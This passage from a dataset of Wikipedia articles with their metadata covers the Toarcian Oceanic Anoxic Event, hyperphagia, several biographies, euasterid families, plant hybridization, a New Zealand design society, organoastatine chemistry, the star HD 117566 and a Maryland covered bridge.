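A sample whose 13C/12C ratio is 0.5% lower than the standard thus records δ13C = −5‰, the order of magnitude of the excursions described in this section.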
The values of 187Os/188Os rose from ~0.40 to ~0.53 during the PTo-E and from ~0.42 to ~0.68 during the TOAE, and many scholars conclude this change in osmium isotope ratios evidences the responsibility of this large igneous province for the biotic crises. Mercury anomalies from the approximate time intervals corresponding to the PTo-E and TOAE have likewise been invoked as tell-tale evidence of the ecological calamity's cause being a large igneous province, although some researchers attribute these elevated mercury levels to increased terrigenous flux. There is evidence that the motion of the African Plate suddenly changed in velocity, shifting from mostly northward movement to southward movement. Such shifts in plate motion are associated with similar large igneous provinces emplaced in other time intervals. A 2019 geochronological study found that the emplacement of the Karoo-Ferrar large igneous province and the TOAE were not causally linked, and simply happened to occur rather close in time, contradicting mainstream interpretations of the TOAE. The authors of the study conclude that the timeline of the TOAE does not match up with the course of activity of the Karoo-Ferrar magmatic event.
The large igneous province also intruded into coal seams, releasing even more carbon dioxide and methane than it otherwise would have. Magmatic sills are also known to have intruded into shales rich in organic carbon, causing additional venting of carbon dioxide into the atmosphere. Carbon release via metamorphic heating of coal has been criticised as a major driver of the environmental perturbation, however, on the basis that coal transects themselves do not show the δ13C excursions that would be expected if significant quantities of thermogenic methane were released, suggesting that much of the degassed emissions were either condensed as pyrolytic carbon or trapped as coalbed methane.
In addition, possible associated release of deep sea methane clathrates has been potentially implicated as yet another cause of global warming. Episodic melting of methane clathrates dictated by Milankovitch cycles has been put forward as an explanation fitting the observed shifts in the carbon isotope record. Other studies contradict and reject the methane hydrate hypothesis, however, concluding that the isotopic record is too incomplete to conclusively attribute the isotopic excursion to methane hydrate dissociation, that carbon isotope ratios in belemnites and bulk carbonates are incongruent with the isotopic signature expected from a massive release of methane clathrates, that much of the methane released from ocean sediments was rapidly sequestered, buffering its ability to act as a major positive feedback, and that methane clathrate dissociation occurred too late to have had an appreciable causal impact on the extinction event. Hypothetical release of methane clathrates extremely depleted in heavy carbon isotopes has furthermore been considered unnecessary as an explanation for the carbon cycle disruption.
It has also been hypothesised that the release of cryospheric methane trapped in permafrost amplified the warming and its detrimental effects on marine life. Obliquity-paced carbon isotope excursions have been interpreted by some researchers as reflecting permafrost decline and consequent greenhouse gas release.
The TOAE is believed to be the second largest anoxic event of the last 300 Ma, and possibly the largest of the Phanerozoic. A positive δ13C excursion, likely resulting from the mass burial of organic carbon during the anoxic event, is known from the falciferum ammonite zone, chemostratigraphically identifying the TOAE. Volcanism from the large igneous province resulted in increased silicate weathering and an acceleration of the hydrological cycle, as shown by an increased amount of terrestrially derived organic matter found in sedimentary rocks of marine origin during the TOAE. Concentrations of phosphorus, magnesium, and manganese rose in the oceans. A −0.5‰ excursion in δ44/40Ca provides further evidence of increased continental weathering. Osmium isotope ratios further confirm a major increase in weathering. The enhanced continental weathering in turn led to increased eutrophication that helped drive the anoxic event in the oceans. Continual transport of continentally weathered nutrients into the ocean enabled high levels of primary productivity to be maintained over the course of the TOAE. Rising sea levels contributed to ocean deoxygenation; as rising sea levels inundated low-lying lands, organic plant matter was transported outwards into the ocean. An alternate model for the development of anoxia is that epicontinental seaways became salinity stratified with strong haloclines, chemoclines, and thermoclines. This caused mineralised carbon on the seafloor to be recycled back into the photic zone, driving widespread primary productivity and in turn anoxia. The freshening of the Arctic Ocean by way of melting of Northern Hemisphere ice caps was a likely trigger of such stratification and a slowdown of global thermohaline circulation. Stratification also occurred due to the freshening of surface water caused by an enhanced water cycle.
Rising seawater temperatures amidst a transition from icehouse to greenhouse conditions further retarded ocean circulation, aiding the establishment of anoxic conditions. Geochemical evidence from what was then the northwestern European epicontinental sea suggests that a shift from cooler, more saline water conditions to warmer, fresher conditions prompted the development of significant density stratification of the water column and induced anoxia. Extensive organic carbon burial induced by anoxia was a negative feedback loop retarding the otherwise pronounced warming and may have caused global cooling in the aftermath of the TOAE. In anoxic and euxinic marine basins in Europe, organic carbon burial rates increased by ~500%. Furthermore, anoxia was not limited to oceans; large lakes also experienced oxygen depletion and black shale deposition.
Euxinia occurred in the northwestern Tethys Ocean during the TOAE, as shown by a positive δ34S excursion in carbonate-associated sulphate that occurs synchronously with the positive δ13C excursion in carbonate carbon during the falciferum ammonite zone. This positive δ34S excursion has been attributed to the depletion of isotopically light sulphur in the marine sulphate reservoir that resulted from microbial sulphur reduction in anoxic waters. Similar positive δ34S excursions corresponding to the onset of the TOAE are known from pyrites in the Sakahogi and Sakuraguchi-dani localities in Japan, with the Sakahogi site displaying a less extreme but still significant pyritic positive δ34S excursion during the PTo-E. Euxinia is further evidenced by enhanced pyrite burial in Zázrivá, Slovakia, enhanced molybdenum burial totalling about 41 Gt of molybdenum, and δ98/95Mo excursions observed in sites in the Cleveland, West Netherlands, and South German Basins. Valdorbia, a site in the Umbria-Marche Apennines, also exhibited euxinia during the anoxic event. There is less evidence of euxinia outside the northwestern Tethys, and it likely only occurred transiently in basins in Panthalassa and the southwestern Tethys. Due to the clockwise circulation of the oceanic gyre in the western Tethys and the rough, uneven bathymetry in the northward limb of this gyre, oxic bottom waters had relatively few impediments to diffuse into the southwestern Tethys, which spared it from the far greater prevalence of anoxia and euxinia that characterised the northern Tethys. The Panthalassan deep water site of Sakahogi was mainly anoxic-ferruginous across the interval spanning the late Pliensbachian to the TOAE, but transient sulphidic conditions did occur during the PTo-E and TOAE. In northeastern Panthalassa, in what is now British Columbia, euxinia dominated anoxic bottom waters.
The early stages of the TOAE were accompanied by a decrease in the acidity of seawater following a substantial decrease prior to the TOAE. Seawater pH then dropped close to the middle of the event, strongly acidifying the oceans. The sudden decline of carbonate production during the TOAE is widely believed to be the result of this abrupt episode of ocean acidification. Additionally, the enhanced recycling of phosphorus back into seawater as a result of high temperatures and low seawater pH inhibited its mineralisation into apatite, helping contribute to oceanic anoxia. The abundance of phosphorus in marine environments created a positive feedback loop whose consequence was the further exacerbation of eutrophication and anoxia.
The extreme and rapid global warming at the start of the Toarcian promoted intensification of tropical storms across the globe.
Effects on life
Marine invertebrates
The extinction event associated with the TOAE primarily affected marine life as a result of the collapse of the carbonate factory. Brachiopods were particularly severely hit, with the TOAE representing one of the most dire crises in their evolutionary history. Brachiopod taxa of large size declined significantly in abundance. Uniquely, the brachiopod genus Soaresirhynchia thrived during the later stages of the TOAE due to its low metabolic rate and slow rate of growth, making it a disaster taxon. The species S. bouchardi is known to have been a pioneer species that colonised areas denuded of brachiopods in the northwestern Tethyan region. Ostracods also suffered a major diversity loss, with almost all ostracod clades' distributions during the time interval corresponding to the serpentinum zone shifting towards higher latitudes to escape intolerably hot conditions near the Equator. Bivalves likewise experienced a significant turnover. The decline of bivalves exhibiting high endemism with narrow geographic ranges was particularly severe. At Ya Ha Tinda, a replacement of the pre-TOAE bivalve assemblage by a smaller, post-TOAE assemblage occurred, while in the Cleveland Basin, the inoceramid Pseudomytiloides dubius experienced the Lilliput effect. Ammonoids, having already experienced a major morphological bottleneck thanks to the Gibbosus Event, about a million years before the Toarcian extinction, suffered further losses in the Early Toarcian diversity collapse. Belemnite richness in the northwestern Tethys dropped during the PTo-E but slightly increased across the TOAE. Belemnites underwent a major change in habitat preference from cold, deep waters to warm, shallow waters. Their average rostrum size also increased, though this trend heavily varied depending on the lineage of belemnites. The Toarcian extinction was catastrophic for corals; 90.9% of all Tethyan coral species and 49% of all genera were wiped out.
Calcareous nannoplankton that lived in the deep photic zone suffered, with the decrease in abundance of the taxon Mitrolithus jansae used as an indicator of shoaling of the oxygen minimum zone in the Tethys and the Hispanic Corridor. Other affected invertebrate groups included echinoderms, radiolarians, dinoflagellates, and foraminifera. Trace fossils, an indicator of bioturbation and ecological diversity, became highly undiverse following the TOAE.
Carbonate platforms collapsed during both the PTo-E and the TOAE. Enhanced continental weathering and nutrient runoff was the dominant driver of carbonate platform decline in the PTo-E, while the biggest culprits during the TOAE were heightened storm activity and a decrease in the pH of seawater.
The recovery from the mass extinction among benthos commenced with the recolonisation of barren locales by opportunistic pioneer taxa. Benthic recovery was slow and sluggish, being regularly set back thanks to recurrent episodes of oxygen depletion, which continued for hundreds of thousands of years after the main extinction interval. Evidence from the Cleveland Basin suggests it took ~7 Myr for the marine benthos to recover, on par with the Permian-Triassic extinction event. Many marine invertebrate taxa found in South America migrated through the Hispanic Corridor into European seas after the extinction event, aided in their dispersal by higher sea levels.
Marine vertebrates
The TOAE had minor effects on marine reptiles, in stark contrast to the major impact it had on many clades of marine invertebrates. In fact, in the Southwest German Basin, ichthyosaur diversity was higher after the extinction interval, although this may be in part a sampling artefact resulting from a sparse Pliensbachian marine vertebrate fossil record.
Terrestrial animals
The TOAE is suggested to have caused the extinction of various clades of dinosaurs, including coelophysids, dilophosaurids, and many basal sauropodomorph clades, as a consequence of the remodelling of terrestrial ecosystems caused by global climate change. Some heterodontosaurids and thyreophorans also perished in the extinction event. In the wake of the extinction event, many derived clades of ornithischians, sauropods, and theropods emerged, with most of these post-extinction clades greatly increasing in size relative to dinosaurs before the TOAE. Eusauropods were propelled to ecological dominance after their survival of the Toarcian cataclysm. Megalosaurids experienced a diversification event in the latter part of the Toarcian that was possibly a post-extinction radiation that filled niches vacated by the mass death of the Early Toarcian extinction. Insects may have experienced blooms as fish moved en masse to surface waters to escape anoxia and then died in droves due to limited resources.
Terrestrial plants
The volcanogenic extinction event initially impacted terrestrial ecosystems more severely than marine ones. A shift towards a low diversity assemblage of cheirolepid conifers, cycads, and Cerebropollenites-producers adapted for high aridity from a higher diversity ecological assemblage of lycophytes, conifers, seed ferns, and wet-adapted ferns is observed in the palaeobotanical and palynological record over the course of the TOAE. The coincidence of the zenith of Classopolis and the decline of seed ferns and spore producing plants with increased mercury loading implicates heavy metal poisoning as a key contributor to the floristic crisis during the Toarcian mass extinction. Poisoning by mercury, along with chromium, copper, cadmium, arsenic, and lead is speculated to be responsible for heightened rates of spore malformation and dwarfism concomitant with enrichments in all these toxic metals.
Geologic effects
The TOAE was associated with widespread phosphatisation of marine fossils believed to result from the warming-induced increase in weathering that increased phosphate flux into the ocean. This produced exquisitely preserved lagerstätten across the world, such as Ya Ha Tinda, Strawberry Bank, and the Posidonia Shale.
As is common during anoxic events, black shale deposition was widespread during the deoxygenation events of the Toarcian. Toarcian anoxia was responsible for the deposition of commercially extracted oil shales, particularly in China.
Enhanced hydrological cycling caused clastic sedimentation to accelerate during the TOAE; the increase in clastic sedimentation was synchronous with excursions in 187Os/188Os, 87Sr/86Sr, and δ44/40Ca.
Additionally, the Toarcian was punctuated by intervals of extensive kaolinite enrichment. These kaolinites correspond to negative oxygen isotope excursions and high Mg/Ca ratios and are thus reflective of climatic warming events that characterised much of the Toarcian. Likewise, illitic/smectitic clays were also common during this hyperthermal perturbation.
Palaeogeographic changes
The Intertropical Convergence Zone (ITCZ) migrated southwards across southern Gondwana, turning much of the region more arid. This aridification was interrupted, however, in the spinatus ammonite biozone and across the Pliensbachian-Toarcian boundary itself.
The large rise in sea levels resulting from the intense global warming led to the formation of the Laurasian Seaway, which enabled cool, low-salinity water to flow from the Arctic Ocean into the Tethys Ocean. The opening of this seaway may have acted as a mitigating factor that ameliorated, to a degree, the oppressively anoxic conditions widespread across much of the Tethys.
The enhanced hydrological cycle during early Toarcian warming caused lakes to grow in size. During the anoxic event, the Sichuan Basin was transformed into a giant lake believed to have been approximately three times as large as modern-day Lake Superior. Lacustrine sediments deposited as a result of this lake's existence are represented by the Da’anzhai Member of the Ziliujing Formation. Roughly 460 gigatons (Gt) of organic carbon and 1,200 Gt of inorganic carbon were likely sequestered by this lake over the course of the TOAE.
Comparison with present global warming
The TOAE and the Palaeocene-Eocene Thermal Maximum have been proposed as analogues to modern anthropogenic global warming based on the comparable quantity of greenhouse gases released into the atmosphere in all three events. Some researchers argue that evidence for a major increase in Tethyan tropical cyclone intensity during the TOAE suggests that a similar increase in magnitude of tropical storms is bound to occur as a consequence of present climate change.
See also
Weissert Event
Selli Event
Bonarelli Event
References
Extinction events
Toarcian Stage
Isotope excursions | Toarcian Oceanic Anoxic Event | [
"Chemistry",
"Biology"
] | 4,832 | [
"Evolution of the biosphere",
"Isotope excursions",
"Extinction events",
"Isotopes"
] |
72,521,456 | https://en.wikipedia.org/wiki/Hyperphagia%20%28ecology%29 | In behavioral ecology, hyperphagia is a short-term increase in food intake and metabolization in response to changing environmental conditions. It is most prominent in a number of migratory bird species. Hyperphagia occurs when fat deposits need to be built up over the course of a few days or weeks, for example in wintering birds that are preparing to start on their spring migration, or when feeding habitat conditions improve for only a short duration.
In preparation for hibernation
Bears
Brown bears can double their weight from spring to autumn, gaining up to of fat. These deposits are used to survive their winter hibernation. During summer and autumn, brown bears have been observed consuming large amounts of insects, roots and bulbs, salmon, and other food sources depending on their location and the availability of food.
During the autumn months, American brown bears consume a large amount of hard masts and berries. Bears living near human settlements may break into buildings or vehicles to eat any food left inside. In some rare cases, the amount of food available from human activity is enough to disrupt regular hibernation behaviour.
In migratory birds
Mallards may engage in hyperphagia in response to winter floods that temporarily make available more wetlands for foraging, heavily increasing their daily food intake to make use of the additional food.
References
Behavioral ecology | Hyperphagia (ecology) | [
"Biology"
] | 265 | [
"Behavioural sciences",
"Ethology",
"Behavior",
"Behavioral ecology"
] |
72,522,672 | https://en.wikipedia.org/wiki/Raymond%20Sheline | Raymond K. Sheline (March 31, 1922 – February 10, 2016) was a member of the Manhattan Project and spent much of his career as a professor in chemistry and physics at Florida State University. Sheline's research focused on spectroscopic studies of atomic nuclei and molecular structures.
Education and career
Sheline was born in Port Clinton, Ohio and was a graduate of Woodward High School. He studied at Bethany College in West Virginia, where he graduated in 1943. From 1943 to 1945, he worked on the Manhattan Project as a chemist at Columbia University. After World War II, Sheline went to graduate school at the University of California, Berkeley, and obtained his PhD in chemistry there in 1949 under the supervision of Kenneth Pitzer. His PhD thesis dealt with vibrational spectroscopy of polyatomic molecules.
Sheline taught at the University of Chicago for two years after his PhD. From 1951 to 1999, Sheline was a professor in chemistry and physics at Florida State University. Between 1966 and 1967, he was named Robert O. Lawton Distinguished Professor.
Sheline was a three-time Guggenheim fellow and a Fulbright scholar.
Personal life
Sheline married Yvonne Sheline in 1951; they had seven children.
References
1922 births
2016 deaths
People from Port Clinton, Ohio
Spectroscopists
Bethany College (West Virginia) alumni
University of California, Berkeley alumni
Manhattan Project people
Florida State University faculty
University of Chicago faculty
American nuclear physicists
Chemical physicists | Raymond Sheline | [
"Chemistry"
] | 288 | [
"Chemical physicists"
] |
72,522,687 | https://en.wikipedia.org/wiki/Olof%20Lundberg | Olof Ingemar Lundberg (born 9 December 1943) was a Swedish business executive and a prominent figure in the mobile satellite services industry. He served as founding Director General and then CEO of Inmarsat (the International Maritime Satellite Organisation), a non-profit intergovernmental organisation created to establish and operate a satellite communications network for the maritime community, from 1979 to 1995; founding Chairman and CEO of ICO Global Communications 1995-2000; and Chairman and CEO of Globalstar 2001-2003.
Early life
Lundberg was born in Gothenburg, Sweden, on 9 December 1943. He went to school at Hvitfeldtska gymnasiet and studied electrical engineering at Chalmers University of Technology.
Career
Lundberg started his career as an engineer at Televerket (the Swedish Telecoms Administration), working there between 1967 and 1979. During that time, he developed Maritex, an automated HF telex system.
In 1979, he was appointed the first Director General and then as CEO of Inmarsat (the International Maritime Satellite Organisation), where he served until 1995, leading the development of mobile satellite communications at sea, on land, and in the air.
Lundberg was Chairman and CEO of ICO Global Communications 1995-2000 and Chairman and CEO of Globalstar 2001-2003.
Lundberg has received the CCIR Award d'Honneur and the ITU Gold Medal. He was awarded the Arthur C. Clarke Award, has twice received the Aviation Week and Space Technology Laureate Award, and has been inducted into their Hall of Fame. He received the Mobile Satellite User's Association (MSUA) Pioneer Award in 2009. He has received the Thulin Medal and the Tsiolkovsky Medal and has been inducted into the SSPI Hall of Fame.
Personal life
Lundberg is an amateur radio enthusiast. He was inducted into the CQ Amateur Radio Hall of Fame in 2015. He lives in England.
References
Telecommunications engineers
Living people
People from Gothenburg
1943 births | Olof Lundberg | [
"Engineering"
] | 396 | [
"Telecommunications engineering",
"Telecommunications engineers"
] |
72,523,469 | https://en.wikipedia.org/wiki/List%20of%20euasterid%20families | The euasterids or core asterids are a group of 69 interrelated families in 15 orders of flowering plants. They tend to have petals that are fused with each other and with the bases of the stamens, and just one integument (covering) around the embryo sac. The asterids as a whole (the euasterids plus two orders of basal asterids) represent almost a third of all flowering plant species.
The euasterids include trees, shrubs, vines and herbaceous perennials and annuals. Sweet potatoes are a tropical staple food. Basil, oregano, sage, rosemary, thyme and peppermint are all kitchen herbs in the mint family. Olives have been cultivated around the Mediterranean for food and oil for at least five thousand years. The daisy family includes lettuce, artichokes, Stevia, sunflowers and tarragon.
Glossary
From the glossary of botanical terms:
annual: a plant species that completes its life cycle within a single year or growing season
basal: attached close to the base (of a plant or an evolutionary tree diagram)
climber: a vine that leans on, twines around or clings to other plants for vertical support
deciduous: falling seasonally, as with bark, leaves, or petals
glandular hair: a hair tipped with a secretory structure
herbaceous: not woody; usually green and soft in texture
mangrove: any shrub or small tree growing in brackish or salt water
perennial: not an annual or biennial
succulent (adjective): juicy or fleshy
unisexual: of one sex; bearing only male or only female reproductive organs
woody: hard and lignified; not herbaceous
The APG IV system is the fourth in a series of plant taxonomies from the Angiosperm Phylogeny Group. In this system, the euasterids are divided into the lamiids and the campanulids. The order Icacinales is basal within the lamiids.
Six euasterid orders have more than two families: Apiales, Aquifoliales, Asterales, Gentianales, Lamiales and Solanales. Apiales and Asterales are exceptionally diverse, with 2342 genera between them. Aquifoliales is basal within the campanulids. Gentianales species have pitted wood and opposite leaves that are joined across the stem. In Lamiales, plants are mostly herbaceous with opposite leaves, and the five-lobed flowers have approximate mirror-image symmetry. Solanales species usually have sepals that continue to grow with age, even when the plant is fruiting.
Families
See also
List of plant family names with etymologies
Notes
Citations
References
Systematic
Euasterid
Euasterid families
euasterid families | List of euasterid families | [
"Biology"
] | 591 | [
"Lists of biota",
"Lists of plants",
"Plants"
] |
72,524,757 | https://en.wikipedia.org/wiki/Hybridization%20in%20perennial%20plants | Hybridization, when new offspring arise from crosses between individuals of the same or different species, results in the assemblage of diverse genetic material and can act as a stimulus for evolution. Hybrid species are often more vigorous and genetically differed than their ancestors. There are primarily two different forms of hybridization: natural hybridization in an uncontrolled environment, whereas artificial hybridization (or breeding) occurs primarily for the agricultural purposes.
Types
There are mainly two types of hybridization: interspecific and intraspecific. Interspecific hybridization is the mating process between two different species. Intraspecific hybridization is the mating process within a species, often between genetically distinct lineages. Hybridization sometimes results in introgression, which can occur in response to habitat disturbance that puts plant species into contact with each other. Introgression is gene transfer among taxa resulting from hybridization followed by repeated backcrossing with parental individuals. Introgressive hybridization occurs often in plants and results in increased genetic variation, which can facilitate rapid response to climate change.
Hybridization in perennial plant systems
Hybridization is considered to be an evolutionary catalyst capable of generating novel genotypes or phenotypes in a single generation. It can also happen with morphologically dissimilar but closely related species (Example: Helianthus giganteus, the giant sunflower).
In plants, hybridization mostly generates speciation events and commonly produces polyploid species. Polyploidy events are a significant factor in understanding hybridization (example: an F1 hybrid of Jatropha curcas x Ricinus communis), because polyploids tend to have an advantage in the early stages of adaptation due to their expanded genomes. As a result, hybridization can be a powerful driver for improving agricultural crops, but can also facilitate unwanted species invasions (e.g., annual sunflower).
While hybridization in perennial plants can occur naturally, for example as the result of cross-breeding with wild-type relatives near agricultural fields, intentional hybridization in perennial crops has also been of recent interest in agriculture. While hybridization and breeding methods have produced successful crop species, declining yield is a major challenge. Thus, further research is needed to leverage hybridization in perennial crop systems to produce sustainable and high-yielding crops. Some methods currently being explored include modern genotyping, phenotyping, and speed-breeding techniques. When crosses in the laboratory are difficult, researchers can study hybrid zones that arise naturally in the field.
For efforts to leverage hybridization to improve perennial crops to be successful, there need to be continued efforts toward building a broad collection of crop wild relatives, genomic sequencing of related species, creating and phenotyping desired hybrid populations, and developing a network of genotype-phenotype associations that feeds into crop breeding pipelines. Hybridization among perennials is also of interest because they may hybridize naturally or artificially with annual crops. In one of the most dietarily and economically significant examples, Dewey (1984) finds that a perennial Agropyron has hybridized with hexaploid wheat, and that an ancient hybridization event contributed significantly to the modern hexaploid multi-genome; as with all other currently grown Triticeae crops, wheat is an annual.
References
Perennials
Hybridization | Hybridization in perennial plants | [
"Biology"
] | 697 | [
"Hybrid plants",
"Plants",
"Hybrid organisms"
] |
72,525,295 | https://en.wikipedia.org/wiki/New%20Zealand%20Society%20of%20Industrial%20Designers | The New Zealand Society of Industrial Designers, known as NZSID, formed in 1959, was a professional body for designers in New Zealand. Its membership was multi-disciplinary, representing designers in all branches of design for industry—interior, product, furniture, graphic, packaging, exhibition, apparel, design education, design management... It was rebranded New Zealand Society of Designers (NZSD) and reconstituted on 28 May 1988 with a full-time office, the Designers Secretariat, from 1 August, and The Best New Zealand Graphic Design Awards scheme from 1 October.
The Society merged with the New Zealand Association of Interior Designers (NZAID) to form a new society, the Designers Institute of New Zealand (DINZ), in April 1991, which was incorporated on 23 August 1991. NZSID and NZAID were formally dissolved as incorporated societies on 11 August and 10 October 2000 respectively.
Regional groups
Three regional groups (branches) were established on 18 February 1967—two in North Island, following the boundary of Auckland Province, and one in South Island:
New Zealand Society of Industrial Designers, Northern Region (Auckland)
New Zealand Society of Industrial Designers, Central Region (Wellington)
New Zealand Society of Industrial Designers, Southern Region (Christchurch)
Officers
Presidents
1959–1959: Hugh Johansen (Provisional Chairman)
1959–1960: Robert Ellis
1960–1962: Peter Parsons †
1962–1963: Paul Beadle
1963–1965: Keith Mosheim
1965–1969: Douglas Heath
1969–1971: Noel Tritton
1971–1973: Don Haynes
1973–1977: Keverne Trevelyan
1977–1981: Michael Smythe
1981–1984: Peter Haythornthwaite
1984–1986: Monica Schaer-Vance
1986–1988: Rudi Schwarz
1988–1992: Mark Adams
† Unconfirmed
Vice-presidents, councillors, secretaries and treasurers (A-Z)
Some members serving various terms, 1959–1992, with indication of office (VP, C, S, T):
Mark Adams (C), Maurice Askew (VP, C), Paul Beadle (VP, C), Jan Beck (C), A. J. Bisley (C), Frank Carpay (C), Mark Cleverly (C), James Coe (VP, C), Kate Coolahan (C), John Crichton (C), Gary Couchman (C), K. Crook (C), John Densem (C), W. J. E. Dodds (C), Gray Dixon (C), Robert Drake (C, S), H. B. Ellis (C), B. Ellis (C), E. Fox (C), Hamish Keith (C), Stephen Green, Peder Hansen (C, S), Don Hatcher (C), Don Haynes (VP, C, S, T), K. Hawkins (C), Max Hailstone (C), Peter Haythornthwaite (C, S), Douglas Heath (VP, C), Gifford Jackson (C), J. Laird (C), Don Little (C, S), Gerry Luhman (C), Clive Luscombe (C), M. J. Mason (C), Stan Mauger (C), Lindsay Missen (C), Keith Mosheim (VP), Geoff Nees (VP, C), Michael Penck (C), Peter Parsons (C, S), G. Percy (C), Mark Pennington (C), Ben Petts (C), G. Preston (C), Don Ramage (C), P. Richings (C), Jolyon Saunders (VP, C, S, T), Monica Schaer (C), Rudi Schwarz (C), Ann Shanks (C), Graham Simpson (C), Michael Smythe (C, S), Richard T. Te One (C), Ray Thorburn (C), Keverne Trevelyan (C), Noel Tritton (VP, C), Bill Tunnicliffe (C), Rowland Walsh (C), Elly van de Wijdeven (C), Erwin T. Winkler (C), Tony Winter (C, S), John Woodruffe (C, T), B. Yap (C), Edward J. Zagorski (C)
Executive Director, Designers Secretariat
1988–1992: Michael Smythe
Publications
SID Scene (1970–). Nos. 1–. Christchurch: New Zealand Society of Industrial Designers Inc.; Designprint Press Ltd. Bi-monthly membership newsletter.
Designz (November 1973–November December 1985). Original series nos. 1–39. Auckland: New Zealand Society of Industrial Designers Inc. – via Auckland Libraries; National Library of New Zealand.
Designz: Magazine of the New Zealand Society of Designers Inc. (September 1988–December 1990). New series nos. 1–7. New Zealand Society of Designers Inc. ISSN: 1170-6686 – via Auckland Libraries; National Library of New Zealand.
References
External links
Designers Institute of New Zealand
Design institutions
New Zealand design
Learned societies of New Zealand
Organizations established in 1959
Arts organizations established in 1959 | New Zealand Society of Industrial Designers | [
"Engineering"
] | 1,079 | [
"Design",
"Design institutions"
] |
72,527,197 | https://en.wikipedia.org/wiki/Organoastatine%20chemistry | Organoastatine chemistry describes the synthesis and properties of organoastatine compounds, chemical compounds containing a carbon to astatine chemical bond.
Astatine is extremely radioactive, with the longest-lived isotope (210At) having a half-life of only 8.1 hours. Consequently, organoastatine chemistry can only be studied by tracer techniques on extremely small quantities. The problems caused by radiation damage as well as difficulties in separation and identification are worse for organic astatine derivatives than for inorganic compounds. Most studies of organoastatine chemistry focus on 211At (half-life 7.21 hours), which is the subject of ongoing studies in nuclear medicine: it is better than 131I at destroying abnormal thyroid tissue.
Astatine-labelled iodine reagents have been used to synthesise RAt, RAtCl2, R2AtCl, and RAtO2 (R = phenyl or p-tolyl). Alkyl and aryl astatides are relatively stable and have been analysed at high temperatures (120 °C) with radio gas chromatography. Demercuration reactions have produced with good yields trace quantities of 211At-containing aromatic amino acids, steroids, and imidazoles, among other compounds.
Astatine has both halogen-like and metallic properties, so that analogies with iodine sometimes hold, but sometimes do not. Astatine can be incorporated into organic molecules via halogen exchange, halodediazotation (replacing a diazonium group), halodeprotonation, or halodemetallation. Initial attempts to radiolabel proteins with 211At exemplify its intermediate behaviour, as astatination (analogous to radioiodination) produces unstable results and it is instead AtO+ (or a hydrolysed species) that probably bonds to proteins. Two-step procedures are used today, first synthesising stable astatoaryl prosthetic groups before incorporating them into the protein. Not only is the C–At bond the weakest of all carbon–halogen bonds (following periodic trends), but also the bond easily breaks as the astatine is oxidised back to free astatine.
References
Further reading
Astatine
Organometallic chemistry | Organoastatine chemistry | [
"Chemistry"
] | 470 | [
"Organometallic chemistry"
] |
72,528,837 | https://en.wikipedia.org/wiki/Stefano%20Bianchi | Stefano Bianchi is an Italian astrophysicist who is currently an Associate Professor at the Mathematics and Physics Department of Università degli Studi Roma Tre in Rome, Italy. He is an INAF Associate and an IAU Member.
Education and career
Bianchi's research interests include different aspects of high-energy astrophysics, focusing on black holes, Active Galactic Nuclei, and X-ray Binaries. He is a member of the NASA/ASI IXPE Science Team and of the ESA XMM-Newton Users' Group. He is involved in the science definition of the future ESA missions Athena and LISA. He has translated three popular science books into Italian.
Main awards
Bruno Rossi Prize 2024, as a member of the IXPE Team
"Città di Monselice" award for Scientific Translation (2007)
Memberships
European Space Agency XMM-Newton Users' Group (2019–present)
Review Editor for Frontiers in Astronomy and Space Sciences
Editorial Board Member for Galaxies
Member of the IXPE Science Team
Member of the IAU
Books and articles
Bianchi has translated three popular science books into Italian.
Hans Christian von Baeyer, , translated by Stefano Bianchi, La Scienza Nuova series, Edizioni Dedalo, 2005, p. 296,
Tom Siegfried, L'Universo strano. Idee al confine dello spazio-tempo, translated by Stefano Bianchi, La Scienza Nuova series, Edizioni Dedalo, 2007, p. 352,
Dan Hooper, Il lato oscuro dell'universo. Dove si nascondono energia e materia, translated by Stefano Bianchi, La Scienza Nuova series, Edizioni Dedalo, 2008, p. 240,
Selected papers
References
1976 births
Living people
Astrophysicists
Italian astrophysicists
Academic staff of Roma Tre University
21st-century Italian physicists
Roma Tre University alumni | Stefano Bianchi | [
"Physics"
] | 422 | [
"Astrophysicists",
"Astrophysics"
] |
72,529,452 | https://en.wikipedia.org/wiki/HD%20117566 | HD 117566, also known as HR 5091, is a solitary yellow-hued star located in the northern circumpolar constellation Camelopardalis. It has an apparent magnitude of 5.74, making it faintly visible to the naked eye. This object is relatively close at a distance of 291 light years based on Gaia DR3 parallax measurements but is receding with a heliocentric radial velocity of . At its current distance, HD 117566's brightness is diminished by 0.12 magnitudes due to interstellar dust.
HD 117566 has a stellar classification of G3 IIIb Fe−1 CH1, indicating that it is a G-type giant with an under-abundance of iron and an overabundance of the CH radical in its spectrum. Its evolutionary stage is unclear. A 1994 paper places it in the Hertzsprung gap, indicating it has ceased hydrogen core fusion and is now evolving toward the red giant branch (RGB). However, Mishenina et al. (2006) found that HD 117566 is already past the RGB and is on the horizontal branch, fusing helium at its core. Nevertheless, it has 2.29 times the mass of the Sun and, at the age of 760 million years, it has expanded to 7.2 times the Sun's radius. It radiates 38.2 times the luminosity of the Sun from its photosphere at an effective temperature of . HD 117566 has a solar metallicity and spins modestly with a projected rotational velocity of .
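The quoted radius and luminosity are tied together by the Stefan-Boltzmann law, L = 4πR²σT⁴, which in solar units reduces to L/Lsun = (R/Rsun)² (T/Tsun)⁴. A minimal consistency sketch in Python (the solar temperature is the standard IAU nominal value; the recovered temperature is an inference from the article's figures, not a sourced measurement):

```python
# Stefan-Boltzmann consistency check: L/Lsun = (R/Rsun)**2 * (T/Tsun)**4
T_SUN = 5772.0  # IAU nominal solar effective temperature, in kelvin

def effective_temperature(l_ratio, r_ratio, t_sun=T_SUN):
    """Invert the Stefan-Boltzmann relation (in solar units) for T_eff."""
    return t_sun * (l_ratio / r_ratio ** 2) ** 0.25

# Values quoted in the article: L = 38.2 Lsun, R = 7.2 Rsun.
t_eff = effective_temperature(38.2, 7.2)  # roughly 5.3e3 K, as expected for a G-type giant
```

The recovered temperature of roughly 5,300–5,400 K is consistent with a G3 giant classification.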
References
G-type giants
Carbon stars
Horizontal-branch stars
Camelopardalis
BD+79 00422
117566
065595
5091 | HD 117566 | [
"Astronomy"
] | 358 | [
"Camelopardalis",
"Constellations"
] |
66,618,358 | https://en.wikipedia.org/wiki/Foxcatcher%20Farm%20Covered%20Bridge | Foxcatcher Farm Covered Bridge, also known as Big Elk Creek Covered Bridge and Fair Hill Covered Bridge, is a Burr truss wooden covered bridge near Fair Hill, Maryland, United States.
History
The bridge crosses Big Elk Creek and is surrounded by the Fair Hill Natural Resources Management Area, the former land holdings of William du Pont Jr. The crossing was originally called Strahorn's Mill Bridge after Strahorn's Mill - one of the properties purchased by William du Pont Jr. in 1927 to create his Foxcatcher Farm estate, which was named after his thoroughbred racing stable.
